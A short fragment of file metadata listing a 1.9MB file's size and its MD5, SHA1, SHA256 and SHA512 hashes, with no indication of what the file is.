SHA512c1cd1df8f3157aa6402db8ac2c6052d2cb3b8a5da2221df751591e6414617c8d37f99a670e169a5b22af6adf4f2a7b79ad6fd45f5f9c0cb0a8107d872c85c8b4
-
Filesize
1.9MB
MD5ffb90a6fe19f8d5df94673aaabf48be1
SHA1f1141dc2879463201710aaba6832736b95b3cbaf
SHA256d8fea28ab53dac762ce3a807009aab00d48435108cb59cf527c076b607f58f6a
SHA51261b87e68f767cc83b5bb5efff75ee893bcacbf91b626b0e04ce6d3f975393c4d38116102b248f8cb91ddddce58a550db8760fe10011e2e0e4581cfad03a6e627